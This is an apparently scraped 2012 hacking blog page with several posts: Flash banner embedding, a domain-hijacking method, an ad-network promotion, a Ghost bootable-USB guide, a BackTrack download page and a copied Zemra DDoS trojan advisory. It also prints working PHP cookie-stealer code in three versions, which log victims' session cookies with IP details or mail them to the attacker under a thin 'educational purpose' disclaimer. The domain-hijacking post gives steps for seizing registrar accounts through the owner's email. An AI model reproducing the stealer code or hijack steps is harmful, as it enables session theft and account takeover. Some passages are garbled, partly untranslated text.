Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.


Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.


Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.


Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.


Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Sunday, 30 September 2012


Maybe you want to put a flash banner on this blog more interesting anda.banner flash installed if you want to advertise something on the blog banner animasi.Flash shaped kerana he has been used extensively on the web site as this.
Here's how to put a flash banner on your blog:
At first, you need to provide this fail first flash should we make by using a web site that provides free banner maker solemnly made ​​online.
After banner you need to upload a banner prepared tersebut.Anda should upload this banner on where where web hosting and get url flash banner to put on blog.Anda may also use googlesite.

Steps to upload a file
1.You need to create an account on
2.Log in use blog accounts, the dashboard click on create.
3.Pada name your site, put the name of your site and enter cod verification below
4.Kemudianpada dashboard page click the new icon on top, put the name on a new page
   your page and click create.
   After finish create page click on add file and browse and upload your flash fail

After uploading your files, the name will be above fail add file.Klik icon on the right to fail and take the link location.Simpan copy this link for a step beyond.
Example link is as below.

Inserting a flash file on the blog:

for the old dashboard:
on the dashboard page .... take design elements ..
add a gadget...html / javascript

for new dashboard
take layout ... add a gadget
select HTML / Javascript
and enter the code below

<embed src=" quality="high" allowscriptaccess="always" type="application/x-shockwave-flash" pluginspage="" align="middle" height="150" width="150"></embed>

Change the red letter with yur banner link
The green is for banner size

Friday, 28 September 2012

How to Hijack Domain

Domain hijacking or domain theft is the act of changing the registration of a domain name without the permission of its original registrant.
This can be financially devastating to the original domain name holder, who may have derived commercial income from a website hosted at the domain or conducted business through that domain's e-mail accounts. Additionally, the hijacker can use the domain name to facilitate illegal activity such as phishing, where a website is replaced by an identical website that records private information such as log-in passwords

Domain hijacking can be done in several ways, generally by exploiting a vulnerability in the domain name registration system or through social engineering.
The most common tactic used by a domain hijacker is to use acquired personal information about the actual domain owner to impersonate them and persuade the domain registrar to modify the registration information and/or transfer the domain to another registrar, a form of identity theft. Once this has been done, the hijacker has full control of the domain and can use it or sell it to a third party.
Responses to discovered hijackings vary; sometimes the registration information can be returned to its original state by the current registrar, but this may be more difficult if the domain name was transferred to another registrar, particularly if that registrar resides in another country. In some cases the original domain owner is not able to regain control over the domain.
The legal status of domain hijacking remains unclear. It is analogous with theft, in that the original owner is deprived of the benefits of the domain, but theft traditionally regards concrete goods such as jewelry and electronics, whereas domain name ownership is stored only in the digital state of the domain name registry, a network of computers. There are no specific laws regarding domain hijacking, nor any law that specifically holds the domain name registrar responsible for allowing the registrant information to be modified without the permission of the original registrant. In some cases there may be recourse under trademark law, but not all domain names are (or can be) registered as trademarks.

The operation of domain name is as follows

Any website say for example consists of two parts. The domain name ( and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.
1. After registering a new domain name, we get a control panel where in we can have a full control of the domain. 
2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.
For a clear understanding let me take up a small example.
MR A registers a new domain “” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “” to point to his web server (of Y). Now whenever an Internet user types “”, the domain name “” is resolved to the target web server and the web page is displayed. This is how a website actually works.

What happens when a domain is hijacked

Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.
For example, a hacker gets access to the domain control panel of  “”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “” he is taken to the hacker’s website (Z) and not to John’s original site (Y).
In this case the John’s domain name ( is said to be hijacked.

How the domain names are hijacked

To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients
1. The domain registrar name for the target domain.
2. The administrative email address associated with the target domain. 
These information can be obtained by accessing the WHOIS data of the target domain. To get access the WHOIS data, goto, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.
To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.
The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it.
Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.

How to protect the domain name from being hijacked

The best way to protect the domain name is to protect the administrative email account associated with the domain. If you loose this email account, you loose your domain. Protect your email account from being hacked. Another best way to protect your domain is to go for private domain registration. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. So when a hacker performs a WHOIS lookup for you domain name, he will not be able to find your name, phone and administrative email address. So the private registration provides an extra security and protects your privacy. Private domain registration costs a bit extra amount but is really worth for it’s advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.


Sunday, 16 September 2012

"Earn Money Online" With The Help of Social Websites

Hello guys WELCOME TO BEST4HACK today i m going to share way to Earn money online with the help SociBuzz on Social Website Like Twitter Facebook YouTube Google+ and you can also Publish it on Blogger and there much more social website where u can publish it as us can see with the help of this website you can earn from your Facebook Account as you don't require and any website to earn this website accepts the traffic from Social website and from this you can earn good Amount of money promises to change the way companies advertiser across all Social Media networks. It's a lofty goal, but they are well on their way.
SociBuzz is web-based social media advertising network that connects advertisers with eager publishers.
In short, = Social Media Advertising + Pay-Per-Click Marketing. recently cited that Social Media Spending is expected to reach 9.8 Billion by 2016. In the article it also stated that “Higher ad spending at Twitter, Facebook, and Linkedin boosted BIA/Kelsey’s forecast from six months ago.” It’s this reason that SociBuzz hopes to become the go to source for Advertisers who anxiously want to extend their social reach.
SociBuzz offers advertisers who are struggling to effectively spread their product, brand, service, or message a unique way to engage potential users. Michael Smith adds, “What makes SociBuzz great is that you can be a novice at social media and still effectively reach your desired audience. All you need is to set an attractive bid amount and our publishers will begin the promotion.” is not just a good deal for potential advertisers, but previously unreachable publishers can also get in on the action.
All you need to make money with SociBuzz is an account at any of the most popular social media profile such as Facebook or Twitter.
Juan Petrello (Sr. Project Manager) puts it like this; “Almost everyone has a social media profile somewhere. Facebook is expected to reach 1 billion users worldwide and all of those users are eligible to become a publisher for SociBuzz – the potential is enormous.”
The inspiration for SociBuzz came from a desire to create an easy to understand and open business model for both advertisers and publishers. SociBuzz is unique in this area because it has a very open policy for what advertisers are offering and what percentage of revenue publishers are earning. “We knew we could do better than the 2 other companies competing in this space!” says Michael. “One company leaves out the masses and it too exclusive and the other one is ripe with bad reviews and claims of fraud. In the realm of Social Media, that doesn't make any sense at all.”
So who stands to benefit the most from SociBuzz?
There are several potential advertisers that could potentially leverage SociBuzz to make the most from it. When asked about this Juan states that “Politicians could help get their political message out. Since SociBuzz is a medium between the ‘advertisers’ and ‘publishers’ - a politician running for public office could easily recruit an army of publishers who would be willing to spread their message and reward them for doing so.

How can i increase my internet speed? answer!

People always ask how to increase their internet speed. just follow the steps below to increase it a bit.

Step 1 : First of all Click on start button.

Step 2 : Select the run button from the start menu or type Run and click on it.

Step 3 : Type gpedit.msc

Step 4 : Expand the Administrative Templates branch

Step 5 : Now expand the Network branch

Step 6 : Click on the Qos packet scheduler 

Step 7 : Double click Limit reservable bandwidth

Step 8 : Check the enabled

Step 9 : Change bandwidth Limit to 0 %

Step 10: Click the Apply button and OK.

Step 11: Now restart your PC.

Step 12. check if its now better..

Step 13 : open this blog and subscribe if you have gained and tell your friends about this blog and the good it has done to you.

How to steal cookie, create a cookie .php to hack

Here is the simple Cookie Stealer code:
Cookie stored in File:
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\\n");
$cookie = $HTTP_GET_VARS["cookie"]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable.

$steal = fopen("cookiefile.txt", "a"); This open the cookiefile in append mode so that we can append the stolen cookie.

fwrite($steal, $cookie ."\\n"); This will store the stolen cookie inside the file.

fclose($steal); close the opened file.

Another version: Sends cookies to the hacker mail  
$cookie = $HTTP_GET_VARS["cookie"]; mail("", "Stolen Cookies", $cookie);
The above code will mail the cookies to hacker mail using the PHP() mail function with subject "Stolen cookies". 

Third Version
Third Version
function GetIP()
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
        $ip = "unknown";
function logData()
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_gobals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
  The above Cookie stealer will store the following information:
  • Ip address
  • port number
  • host(usually computer-name)
  • user agent
  • cookie

This Article is for Educational purpose only, written for Ethical Hackers. This article is for creating public awareness about the Internet Risks.

Create Ghost Bootable SD Card or USB Flash Drive

Binary Research developed Ghost in Auckland, New Zealand. After the Symantec acquisition, a few functions (such as translation into other languages) were moved elsewhere, but the main development remained in Auckland until October 2009 at which time much was moved to India. Technologies developed by 20/20 Software were integrated into Ghost after their acquisition by Symantec in April 2000.

Although disk cloning programs are not primarily backup programs, they are sometimes used as such. A key feature of a backup program is to allow the retrieval of individual files without needing to restore the entire backup. Disk cloning programs either provide a Windows Explorer-like program to browse image files and extract individual files from them, or allow an image file to be mounted as a read-only filesystem within Windows Explorer.
Ghost is marketed as a backup program. It comes with an ISO file that needs to be written to a CD. This provides a recovery environment to perform a full system recovery. There is also provision to mount a drive and select backed-up files from that drive and recover them to the primary hard disk.
Ghost can copy the contents of one hard drive to another and can convert a hard drive′s contents to a virtual disk format such as VMware′s VMDK file.

It's a good practice to create an image of your hard drive before you start using it. Especially when you had to build that computer from scratch and spent hours installing the operating system and all of your favorite apps...

As Symantec Ghost becomes more user friendly, people start to recognize this idea. The idea also works well when you need to clean your PC from viruses. In case anything goes wrong with the operating system, you just need to restore the image using the Symantec bootable CD.

However, the problem comes when we deal with the new version of those small laptops: The netbooks! which usually don't come with a built-in CD-ROM drive to bootup the PC.
The most simple solution would be buying an external CD-ROM drive, which costs you money. And in some cases, you just want to bootup the Symantec Ghost.... with whatever available!

Almost every recent laptop/netbook comes with a card reader, and even if you wasn't lucky enough, your laptop/netbook should have a USB port!

This guide will tell you how to create a bootable SD card or a USB flash drive with Symantec Norton Ghost.
This task can be done with several different versions of Symantec Ghost; however, the steps from this articles are based on Symantec Ghost 14.

What you need?
  • Symantec Ghost 14 bootable CD. (Some other versions might also work)
  • A PC with bootable CD/DVD drive.
  • An SD card (either SD or SDHC), or a USB thumb drive. The size can be as minimum as 1 GB. You can also pick a large SD card if you want to store your hard drive image to the card as well.
  • An SD slot or a card reader (for SD card) or a USB slot (for thumb drive) 
Follow the steps in order. Use this guide at your own risks.

  1. First, check to make sure your CD/DVD drive is bootable. (See your BIOS manual or PC user guide for details since this is out of the scope of this article).
  2. - For SD card: Make sure the SD slot or the card reader is available. if it's a card reader, connect it to the PC. Also insert the card.
    - For USB thumb drive: Make sure the drive is inserted into one of the USB slots.
  3. Bootup the computer using the Symantec Ghost CD (Details vary on different computers). On Windows XP, during the startup, you should see the prompt "Press any key to boot from CD...".
  4. Once the Symantec Recovery startup is complete, you should see the main screen of Symantec Ghost 14 Recovery similar to this image:

  5. Select "Analyze" from the left menu.

  6. Then click on "Open Command Shell Window". A command prompt window will display.

  7. At this command prompt window, type: "diskpart" (one word, without quotes) and hit enter. The prompt now changed to "DISKPART>"

  8. Now type "list disk" and hit enter. You should now see a list of all available disks. Base on the size of each disk listed, find the one that matching your SD card (or thumb drive) and note its disk number under "Disk ###". If you don't see your SD card (or flash drive) listed, verify if it is inserted or plugged in (you might need to restart the computer and try again).

  9. Type "select disk <n>" (replace <n> with the disk # noted from the previous step) then hit enter.
    Important!! Besure to select the correct disk (your SD card or thumb drive) as you will be erasing the drive.
    Sample image with a 4-GB SD selected:

  10. Create a primary partition for the the disk by executing the following sequence of commands:
    create partition primary
    select partition 1

  11. Set the primary partition active, type: "active" and hit enter

  12. Perform a quick format with the following command:
    format fs=fat32 quick

  13. Then type:

  14. Your SD card (or the flash drive) is now bootable and will act similar to a local hard drive. In order to boot this card with Symantect Ghost Recovery, copy all contents from the Symantec Ghost disc to the SD card (or the flash drive). Besure to copy everything including any hidden files/folders.

    The SD card or flash drive is now bootable and will boot your laptop/netbook to Symantec Ghost Recovery utilities exactly the same way as of the CD (To boot with the card on your laptop/netbook, don't forget to set your bios to search for the SD card or USB external devices in the boot sequence).

Version history

Ghost 3.1

The first versions of Ghost supported only the cloning of entire disks, however version 3.1 in 1997 allowed the cloning of individual partitions. Ghost could clone a disk or partition to another disk or partition or to an image file. Ghost allowed for writing a clone or image to a second disk in the same machine, another machine linked by a parallel or network cable, a network drive, or to a tape drive.

Ghost 4.0 and 4.1

Version 4.0 of Ghost added multicast technology, following the lead of a competitor, ImageCast. Multicasting allows sending a single backup image simultaneously to other machines without putting greater stress on the network than by sending an image to a single machine. This version also introduced Ghost Explorer, a Windows program which allowed a user to browse the contents of an image file and extract individual files from it. Explorer was subsequently enhanced to allow users to add and delete files on FAT, later on ext2, ext3 and NTFS filesystems in an image. Until 2007, Ghost Explorer could extract files from NTFS images but not edit NTFS images. Ghost Explorer could work with images from older versions but only slowly; version 4 images contained indexes to find files rapidly. Version 4.0 also moved from real-mode DOS to 286 protected-mode. The additional memory available allowed Ghost to provide several levels of compression for images, and to provide the file browser. In 1998, Ghost 4.1 allowed for password-protected images.

Ghost 5.0

Version 5.0 moved to 386 protected mode. Unlike the character-based user interface of earlier versions, 5.0 used a GUI. The Binary Research logo, two stars revolving around each other, played on the main screen while the program idled. In 1998 Gdisk, a script based partition manager, was integrated in Ghost. Gdisk serves a role similar to Fdisk, but has greater capabilities.

Ghost for NetWare

There was also a Norton Ghost version (called 2.0) for Novell NetWare around 1999, with supported NSS partitions (although it ran in DOS, like the others).

Ghost 6.0 (Ghost 2001)

Ghost 6.0 included a Console application in 2000 to simplify the management of large numbers of machines. The Console communicates with client software on managed computers to allow a system administrator to refresh the disk of a machine remotely.
As a DOS-based program, Ghost required machines running Windows to reboot to a DOS environment to run it. Ghost 6.0 required a separate DOS partition when used with the Console.

Ghost 7.0 / Ghost 2002

Released March 31, 2001 Norton Ghost version 7.0 (retail) was marketed as Norton Ghost 2002 Personal Edition. Help|About reveals version 7.00.

Ghost 7.5

Released December 14, 2001
Ghost 7.5 in 2002 created a ‘Virtual Partition’ instead – a DOS partition which actually exists as a file within a normal Windows filesystem. This significantly eased systems management because the user no longer had to set up their own partition tables. Ghost 7.5 could also write images to CD-R drives, and later versions can also write DVDs.

Symantec Ghost 8.0

Ghost 8.0 includes a standalone executable (filename: ghost32.exe) that runs directly from Windows, without the need to reboot. It is very well-suited for placement on bootable media, such as BartPE′s bootable CD. The Corporate edition supports Unicast, Multicast and peer-to-peer transfers via TCP/IP. Ghost 8.0 also allows an image to be saved on, or read from, an NTFS filesystem, although NTFS is not normally accessible from a DOS program.

Norton Ghost 2003

Norton Ghost 2003, a consumer edition of Ghost, was released on September 6, 2002. Available as an independent product, Norton Ghost 2003 was also included as a component of Norton SystemWorks 2003 Professional. A simpler, non-corporate version of Ghost, Norton Ghost 2003 does not include the Console but has a Windows front-end to script Ghost operations and create a bootable Ghost diskette (third-party CD burning software can be used to create a bootable Ghost CD based on a bootable Ghost diskette). The machine still needs to reboot to the Virtual Partition, but the user doesn′t need to interact with DOS. Symantec deprecated LiveUpdate support for Norton Ghost 2003 in early 2006.

Symantec Ghost Solution Suite 1.0 (Ghost 8.2)

Symantec Ghost 8.2
In 2004, Symantec renamed the Enterprise version of Ghost to Symantec Ghost Solution Suite 1.0. This helped to clarify the difference between the consumer and business lines of the product. This was further defined in February 2006, with the Release of Norton Save And Restore (some packages are labelled Norton Backup And Restore), a standalone backup application based on Ghost 10.0.
Released November 15, 2004

Symantec Ghost Solution Suite 1.1 (Ghost 8.3)

Ghost Solution Suite 1.1 was released December 2005. Some of the new features include the ability to create an image file that is larger than 2 GB (in Ghost 8.2 or earlier versions, such image files are automatically split into two or more segments, so that each segment has a maximum size of 2 GB), more comprehensive manufacturing tools, and the ability to create a universal boot disk. Ghost Solution Suite is a bundle of an updated version of Ghost, Symantec Client Migration (a user data and settings migration tool) and the former PowerQuest equivalent, DeployCenter (using PQI images).

Norton Ghost 9.0 (includes Ghost 2003)

A screen shot of Norton Ghost 9.0 as seen in Windows 2000
Ghost 9.0 was released August 2, 2004. It represents a significant shift in the consumer product line from Ghost 2003, in several ways:
  • It uses a totally different code base, based on the DriveImage/V2i Protector product via Symantec′s acquisition of PowerQuest.
  • The main product is a Windows-based application that must be installed on the target system.
  • Images of the system can be made while Windows is running, rather than only when booted directly into DOS-mode Ghost.
  • Incremental images (containing only changes since the last image) are supported.
  • The Windows application requires Product Activation in order to function fully.
  • The bootable environment on the Ghost 9 CD is only useful for recovery of existing backups – it cannot be used to create new images.
Since the DriveImage-based Ghost 9 did not support the older .gho format disk images, a separate CD containing Ghost 2003 was included in the retail packaging for users needing to access those older images.
The limitations of Ghost 9 compared to Ghost 2003 were not well communicated by Symantec, and resulted in many dissatisfied customers who purchased Ghost 9 expecting the previous version′s features (like making images from the bootable Ghost environment, no installation required, and no product activation).

Norton Ghost 10.0

Supported media CDR/RW and DVD+-R/RW drives, USB and FireWire (IEEE 1394) devices, and Iomega Zip and Jaz drives. Enables the encryption of backups and support for Maxtor external drives with Maxtor OneTouch buttons. The Ghost version 10.0 are compatible with previous revisions, but not with future revisions.

Norton Save And Restore 1.0 (Ghost 10.0)

Norton Save And Restore 1.0, released February 2006, was the renamed consumer version of Ghost. The system utilized Ghost 10.0′s engine, with the addition of features to allow backup and restoration of individual files.

Symantec Ghost Solution Suite 2.0 (Ghost 11.0)

Ghost Solution Suite 2.0 was released in November 2006. This version provides significant improvements in performance, as well as the ability to edit NTFS images. This version also adds support for Windows Vista, x64 versions of Windows, and GUID Partition Table (GPT)-based disks (although the software does not yet fully support systems with Extensible Firmware Interface (EFI)-compliant firmware). Running Live Update from Ghost Explorer will update Ghost to
Ghost 11.0 supported image formats to save and restore: *.GHO, *.GHS, *.IMG, *.RAW

Norton Ghost 12.0

Ghost 12.0 includes Windows Vista support with an updated and more thorough user interface. It allowed for a full system backup & one where individual files or folders can be selected & backed up.
This version also provided a “LightsOut Restore” feature. This restored a system with an on-disk software recovery environment, thereby allowing a recovery without a bootable CD. Upon computer boot-up, a screen will ask which drive to boot from, the regular drive, or the LightsOut restore virtual drive.
LightsOut restore would augment the ISO disk, which came with the Ghost program, that had to be burned to a CD. That contained a recovery environment that allowed one to recover files even if Windows didn′t start up, but the computer could turn on. The latest update to that program was

Norton Save & Restore 2.0 (Ghost 13.0)

NSR 2.0 has fewer features when compared to Norton Ghost 12. NSR 2.0 offers one-time backups, file and folder backup, simplified schedule editor, Maxtor OneTouch integration and modifiable Symantec recovery disc.
This version also supports 32-bit and 64-bit versions of Windows XP and Vista.

Norton Ghost 14.0

The window where you can set Norton Ghost to automatically back up a drive based upon the level of global computer based threats, as judged by Symantec′s ThreatCon grading system.
Version 14.0 preserves the features of version 12.0, with the ability to make full Volume Snapshot Service (VSS) backups and the option to make remote backups to an FTP site as another storage option. Ghost also leverages data from ThreatCon, which monitors malware activity around the world, and performs incremental backups when a specific threat level is reached. However, this functions only when connected to the Internet, so it will not resist any local attack.
Other features include the ability to back up to Network-attached storage devices and support of NTFS partitions up to 16TB. Ghost can manage other installations of version 12.0 or later across a network. Version 14 supports XP and Vista. The latest version is This version no longer supports opening of older version .gho image files. Rather, it stores images in .v2i format. Incremental backup images created with Norton Ghost saved with the file extension .IV2I on a regular basis after the initial volume backup (.V2I). The .iv2i file must be saved along with the initial .v2i backup file in order to function correctly. Older .gho image files can be restored using Ghost Explorer, a separate utility.

Symantec Ghost Solution Suite 2.5

This is the current version of the enterprise software, and includes Ghost 11.5. It was released in May 2008. New features include DeployAnywhere, Hot Imaging, logical volume support, additional image formats, and new PreOS (boot disk) operating systems. As of January 6, 2010, the latest build from Live Update is (Live Update 5 (LU5)). This update provides support for Windows 7 and 2008 R2. Furthermore Ghost 11.5 is compatible with BartPE's bootable CD using a PE Builder plug-in for Symantec Ghost 11.
Ghost 11.5 supported image formats to save: *.GHO, *.GHS, *.VMDK
Ghost 11.5 supported image formats to restore: *.GHO, *.GHS, *.VMDK, *.V2I, *.IV2I, *.PQI
  • Improved support for virtual formats
New Features Description
DeployAnywhere Allows drivers to be injected during image deployment to lessen the need for hardware dependent images.
Hot Imaging Allows live machines to be used as the source to keep images from becoming stale and out of date.
Image Formats
PreOS (boot disk) operating systems

Norton Ghost 15.0

Ghost was updated in November 2009 to v15.0.0.35659. According to the manual on Symantec′s site, the following features are available in Ghost 15:
New Features Description
Improved support for virtual formats Norton Ghost now includes support for the following virtual platforms:
  • VMware ESX 3.5i and 4.0i
  • VMware ESX 3.5 and 4.0
Improved platform support Norton Ghost now includes support for the following platforms:
  • Windows 7
  • Windows Vista with SP2 (includes Home Basic, Home Premium, Business-Retail, and Ultimate)
  • BitLocker-encrypted volume support
Create recovery points from within Symantec Recovery Disk You can now create independent recovery points using the new Back Up My Computer feature in Symantec Recovery Disk. Sometimes known as a cold backup or offline backup, you can create recovery points of a partition without the need to install Norton Ghost or its Agent.
Convert recovery points to virtual disks using a schedule You can now create schedules to convert recovery points to VMware Virtual Disk and Microsoft Virtual Disks, or directly to a VMware ESX 3.5 server.
Support for Microsoft Hyper-V You can now convert recovery points to Hyper-V format and also import recovery points to a Hyper-V server.
Support for Blu-ray disc media Back up your computer directly to Blu-ray, DVD, or CD. Or, you can copy recovery points to Blu-ray, DVD, or CD.
30-day trial If you choose to delay installation of the product license, all features will not be enabled during the 30-day trial period. The 30-day trial period begins when you do a particular task.
On April 1, 2010 an updated version of Norton Ghost 15 was released. The current version is

Thursday, 13 September 2012

Backtrack 5 Free Download

BackTrack 5 Free Download | What is BackTrack | Download BackTrack

 BackTrack 5 Free Download | What is BackTrack | Download BackTrack

Click Here to Download BackTrack 5 For free 

Before Giving the Free Download Link, I Would First like to tell tell you What is BackTrack, I know many of you might be already aware of it, but still there are manyh more who don’t.

What is BackTrack:-

BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you’re making BackTrack you Install BackTrack, boot it from a Live DVD or thumbdrive, the penetration distribution has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester .

BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tools collection to-date. Our community of users range from skilled penetration testers in the information security field, government entities, information technology, security enthusiasts, and individuals new to the security community.
Feedback from all industries and skill levels allows us to truly develop a solution that is tailored towards everyone and far exceeds anything ever developed both commercially and freely available. The project is funded by Offensive Security. Whether you’re hacking wireless, exploiting servers, performing a web application assessment, learning, or social-engineering a client, BackTrack is the one-stop-shop for all of your security needs.
Enough of information about backtrack..
I know many of you might be thinking, Just Bring on the link to download BackTrack 5 Free.
Well your wait is over.


The BackTrack distribution originated from the merger of two formerly competing distributions which focused on penetration testing:
  • WHAX: a Slax based Linux distribution developed by Mati Aharoni, a security consultant. Earlier versions of WHAX were called Whoppix and were based on Knoppix.
  • Auditor Security Collection: a Live CD based on Knoppix developed by Max Moser which included over 300 tools organized in a user-friendly hierarchy.
The overlap with Auditor and WHAX in purpose and in their collection of tools partly led to the merger.


BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option.
BackTrack includes many well known security tools including:
BackTrack arranges tools into 12 categories:
  • Information Gathering
  • Vulnerability Assessment
  • Exploitation Tools
  • Privilege Escalation
  • Maintaining Access
  • Reverse Engineering
  • RFID Tools
  • Stress testing
  • Forensics
  • Reporting Tools
  • Services
  • Miscellaneous


Date Release
February 5, 2006 BackTrack v.1.0 Beta
May 26, 2006 The BackTrack project released its first non-beta version (1.0).
March 6, 2007 BackTrack 2 final released.
June 19, 2008 BackTrack 3 final released.
January 9, 2010 BackTrack 4 final release. (Linux kernel
May 8, 2010 BackTrack 4 R1 release
November 22, 2010 BackTrack 4 R2 release
May 10, 2011 BackTrack 5 release (Linux kernel 2.6.38)
August 18, 2011 BackTrack 5 R1 release (Linux kernel
March 1, 2012 BackTrack 5 R2 release (Linux kernel 3.2.6)
August 13, 2012 BackTrack 5 R3 release
As soon as newer versions of BackTrack are released, older versions lose their support and service from the BackTrack development team.

Click Here to Download BackTrack 5 For free 

Sunday, 2 September 2012

The Zemra Bot – New DDoS Attack Pack

Summary :-

           June 26, 2012
June 26, 2012 2:47:51 PM
Systems Affected:
Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XP
Backdoor.Zemra is a Trojan horse that opens a back door and downloads more files onto the compromised computer.

Antivirus Protection Dates

  • Initial Rapid Release version pending
  • Latest Rapid Release version pending
  • Initial Daily Certified version pending
  • Latest Daily Certified version pending
  • Initial Weekly Certified release date June 27, 2012

Threat Assessment


  • Wild Level: Low
  • Number of Infections: 0 - 49
  • Number of Sites: 0 - 2
  • Geographical Distribution: Low
  • Threat Containment: Easy
  • Removal: Easy


  • Damage Level: Medium
  • Payload: Opens a back door. Downloads files.


  • Distribution Level: Low

A new Distributed Denial of Service (DDoS) crimeware bot known as “Zemra” and detected by Symantec as Backdoor.Zemra. Lately, this threat has been observed performing denial-of-service attacks against organizations with the purpose of extortion. Zemra first appeared on underground forums in May 2012 at a cost of €100.
This crimeware pack is similar to other crime packs, such as Zeus and SpyEye, in that is has a command-and-control panel hosted on a remote server. This allows it to issue commands to compromised computers and act as the gateway to record the number of infections and bots at the attacker’s disposal.
Similar to other crimeware kits, the functionality of Zemra is extensive:
  • 256-bit DES encryption/decryption for communication between server and client
  • DDoS attacks
  • Device monitoring
  • Download and execution of binary files
  • Installation and persistence in checking to ensure infection
  • Propagation through USB
  • Self update
  • Self uninstall
  • System information collection
However, the main functionality is the ability to perform a DDoS attack on a remote target computer of the user’s choosing.
Initially, when a computer becomes infected, Backdoor.Zemra dials home through HTTP (port 80) and performs a POST request sending hardware ID, current user agent, privilege indication (administrator or not), and the version of the OS. This POST request gets parsed by gate.php, which splits out the information and stores it in an SQL database. It then keeps track of which compromised computers are online and ready to receive commands.
Inspection of the leaked code allowed us to identify two types of DDoS attacks that have been implemented into this bot:
  • HTTP flood
  • SYN flood
Symantec added detection for this threat under the name Backdoor.Zemra, which became active on June 25, 2012. To reduce the possibility of being infected by this Trojan, Symantec advises users to ensure that they are using the latest Symantec protection technologies with the latest antivirus definitions installed.

Technical Details :-

When the Trojan is executed, it creates the following files:
  • %UserProfile%\Application Data\wscntfy.exe
  • %Program Files%\Common Files\lsmass.exe

Next, it deletes the following files:
  • %Windir%\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.212.730029
  • %Windir%\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.740.735006
  • %Windir%\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.740.734996
  • %Windir%\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.212.729999
  • %%UserProfile%\Application Data\Microsoft\CLR Security Config\v2.0.50727.42\security.config.cch.212.730149
  • %%UserProfile%\Application Data\Microsoft\CLR Security Config\v2.0.50727.42\security.config.cch.740.735197

The Trojan then modifies the following file:

Next, the Trojan creates the following registry entries so that it executes whenever Windows starts:
